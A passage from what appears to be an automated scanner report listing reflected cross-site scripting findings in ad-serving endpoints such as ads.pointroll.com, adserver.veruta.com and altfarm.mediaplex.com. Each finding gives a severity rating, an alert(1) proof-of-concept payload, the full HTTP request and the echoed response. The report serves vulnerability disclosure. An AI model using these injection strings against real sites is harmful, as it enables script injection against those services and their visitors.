GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891&pid=42375771675<script>alert(1)</script>d3c41350c71&ps=-1&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:53 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2950


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "42375771675<script>alert(1)</script>d3c41350c71"

   
                                                           </head>
...[SNIP]...
1.37. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 306f0--><script>alert(1)</script>135101e601a was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891306f0--><script>alert(1)</script>135101e601a&pid=423757&ps=-1&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:51 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3315


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1486891306f0--><script>alert(1)</script>135101e601a" -->
...[SNIP]...
1.38. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 4ce19--><script>alert(1)</script>f8c3628d761 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1486891&pid=423757&ps=-14ce19--><script>alert(1)</script>f8c3628d761&zw=405&zh=220&url=http%3A//www.foxnews.com/politics/index.html&v=5&dct=Politics%20-%20FoxNews.com&ref=http%3A//www.foxnews.com/&metakw=politics,presidential%20politics,political%20news,political%20parties,American%20politics HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:56 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3754


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-14ce19--><script>alert(1)</script>f8c3628d761" -->
   
...[SNIP]...
1.39. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3fbf"-alert(1)-"b5702b8b71e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=300x250&section=1209091&e3fbf"-alert(1)-"b5702b8b71e=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540075598&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:30 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:41:30 GMT
Pragma: no-cache
Content-Length: 4325
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?Z=300x250&e3fbf"-alert(1)-"b5702b8b71e=1&s=1209091&_salt=1090008792";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...
1.40. http://ads.pointroll.com/PortalServe/ [flash parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f954"%3balert(1)//0685f976cd0 was submitted in the flash parameter. This input was echoed as 1f954";alert(1)//0685f976cd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=101f954"%3balert(1)//0685f976cd0&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=101f954";alert(1)//0685f976cd0&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
1.41. http://ads.pointroll.com/PortalServe/ [r parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f096"%3balert(1)//da375838548 was submitted in the r parameter. This input was echoed as 3f096";alert(1)//da375838548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.83308077603578573f096"%3balert(1)//da375838548 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.83308077603578573f096";alert(1)//da375838548&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
1.42. http://ads.pointroll.com/PortalServe/ [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bebe2"-alert(1)-"8184f578ad5 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-5&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$bebe2"-alert(1)-"8184f578ad5&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$bebe2"-alert(1)-"8184f578ad5&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
1.43. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b81e"%3balert(1)//6be3b67e9ff was submitted in the time parameter. This input was echoed as 7b81e";alert(1)//6be3b67e9ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1190962H87920110119151326&flash=10&time=6|7:35|-57b81e"%3balert(1)//6be3b67e9ff&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&r=0.8330807760357857 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:14 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"

document.write("<iframe id='profr1190962' src='http://ads.pointroll.com/PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-57b81e";alert(1)//6be3b67e9ff&r=0.8330807760357857&flash=10&server=polRedir' width='468' height='60' frameborder='0' marginwidth='0' marginheight='0' scrolling='NO'>
...[SNIP]...
1.44. http://adserver.veruta.com/cookiematch.fcgi [admeld_adprovider_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 479b2'%3balert(1)//4fedd6f1f24 was submitted in the admeld_adprovider_id parameter. This input was echoed as 479b2';alert(1)//4fedd6f1f24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567479b2'%3balert(1)//4fedd6f1f24&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567479b2';alert(1)//4fedd6f1f24&external_user_id=0&expiration=1305131482"/>');
1.45. http://adserver.veruta.com/cookiematch.fcgi [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95419'%3balert(1)//eb12da10d08 was submitted in the admeld_callback parameter. This input was echoed as 95419';alert(1)//eb12da10d08 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match95419'%3balert(1)//eb12da10d08 HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 174

document.write('<img width="0" height="0" src="http://tag.admeld.com/match95419';alert(1)//eb12da10d08?admeld_adprovider_id=567&external_user_id=0&expiration=1305131482"/>');
1.46. http://adserving.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c58a'-alert(1)-'95756830280 was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x903c58a'-alert(1)-'95756830280&section=1836970&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:01:49 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:01:49 GMT
Content-Length: 410

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x903c58a'-alert(1)-'95756830280&inv_code=1836970&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x903c58a%27-alert%281%29-%2795756830280%26section%3D1836970%26
...[SNIP]...
1.47. http://adserving.cpxinteractive.com/st [section parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5742'-alert(1)-'b8bc09776c7 was submitted in the section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1836970c5742'-alert(1)-'b8bc09776c7&referrer=http://www.foxnews.com/politics/index.html HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:01:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:01:53 GMT
Content-Length: 410

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=728x90&inv_code=1836970c5742'-alert(1)-'b8bc09776c7&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1836970c5742%27-alert%281%29-%27b8bc09776c7%26referrer%3Dhttp%3
...[SNIP]...
1.48. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4de2c'-alert(1)-'6b2a2793137 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=5323554de2c'-alert(1)-'6b2a2793137&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:20:17 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 553
Date: Mon, 11 Apr 2011 16:21:46 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...
_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=ifr;ord1=280882;contx=none;an=100;dc=w;btg=;~aopt=3/1/e4/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/1551-48114-17349-5?mpt=5323554de2c'-alert(1)-'6b2a2793137">
...[SNIP]...
1.49. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d43'%3balert(1)//82d6def5476 was submitted in the mpvc parameter. This input was echoed as 20d43';alert(1)//82d6def5476 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f20d43'%3balert(1)//82d6def5476 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
